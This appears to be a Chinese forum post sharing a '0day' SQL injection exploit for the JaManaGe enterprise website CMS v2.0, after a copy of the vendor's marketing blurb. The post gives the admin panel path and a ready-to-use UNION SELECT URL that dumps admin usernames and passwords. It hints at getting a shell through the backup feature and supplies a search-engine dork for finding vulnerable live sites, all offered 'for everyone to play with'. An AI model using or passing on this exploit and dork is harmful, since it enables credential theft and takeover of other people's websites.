JaManaGe 企业建站系统 v2.0 注入漏洞

aManaGe企业建站系统具有完善的企业网站后台管理功能，能通过后台简单操作实现大量的信息更新。完

善的系统，产品，新闻，人才和客户服务等功能更让你的企业便利于网上办公。通用的后台管理功能更方

便企业的网站管理，我们更提供全面的在线技术支持。让你用得称心。


后台:admin/admin.htm

exp:
http://127.0.0.1/ShowNews.asp?id=42 union select 1,admin,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from manager

个别是10个字段.

拿shell很简单,后台有备份. 就不说了.............

最近在外地上线时间少. 今天跑来网吧上一下,发个0day大家玩.

test dork:
inurl:BookShow.asp?id= 『留言标题』发表时间

更多的关键词,自行构建.